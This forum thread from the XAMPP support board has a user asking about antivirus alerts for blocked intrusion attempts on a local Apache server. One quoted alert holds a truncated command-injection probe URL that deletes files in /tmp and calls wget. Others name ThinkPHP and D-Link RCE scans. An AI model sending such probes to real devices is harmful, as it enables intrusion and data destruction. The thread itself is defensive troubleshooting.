Apache Friends Support Forum

[dp2020]

Hi everyone,

I recently installed XAMPP and am quite happy to have found it.
One issue I've been experiencing most days I turn on at least the Apache module: my Norton Security software keeps reporting these blocked "High Severity" intrusion attempts from various IP addresses. Here's an example:

Attack: ThinkPHP getShell Remote Code Execution 2.
Attacking computer: remote IP address, 40868
Attacking URL: My IP address/index.php?s=captcha
Destination address My IP address, 80
The attack was resulted from \DEVICE\HARDDISKVOLUME3\XAMPP\APACHE\BIN\HTTPD.EXE

Not all attacks have the same details although the attack always "was resulted from \DEVICE\HARDDISKVOLUME3\XAMPP\APACHE\BIN\HTTPD.EXE".

So what do you think? Should I be worried? Is there something (like a a setting on my computer) triggering these intrusion attempts?

I'm only using XAMPP on a local computer as recommended.

Thank you for any advice.

Dan

[gsmith]

Sounds like a scan by an evil-doer to me, you will get them all the time looking for known vulnerabilities.

For this ThinkPHP one, https://blog.sucuri.net/2019/04/thinkph ... ution.html

If you're using a vulnerable version of ThinkPHP, you'd be doomed but for Norton blocking it. This is why all internet facing software should be kept up to date. Install & forget is a dangerous practice that most people fall into.

[dp2020]

GSmith,

Thank you for your reply. To be honest I had no idea what ThinkPHP was until today and I don't have it on my computer. I usually keep my installed software up to date.

Here's another one:

CCTV DVR Remote Code Execution
Attacking URL: My computer's IP followed by /shell?cd+/tmp;rm+-rf+*;wget+

or

D-Link Router Command Injection
Attacking URL: MyComputer's IP followed by /HNAP1/

It's not clear to me why I am being triggered so often by these attacks. Having a local server installed is completely new to me.

[gsmith]

You're being targeted because you have an IP. I'm being targeted because I have an IP. Everyone with an IP is targeted, not just you.

[dp2020]

I have finally found the reason behind these intrusion attempts: my computer had been for some time connected directly via modem (without a router) so my IP was an easy target.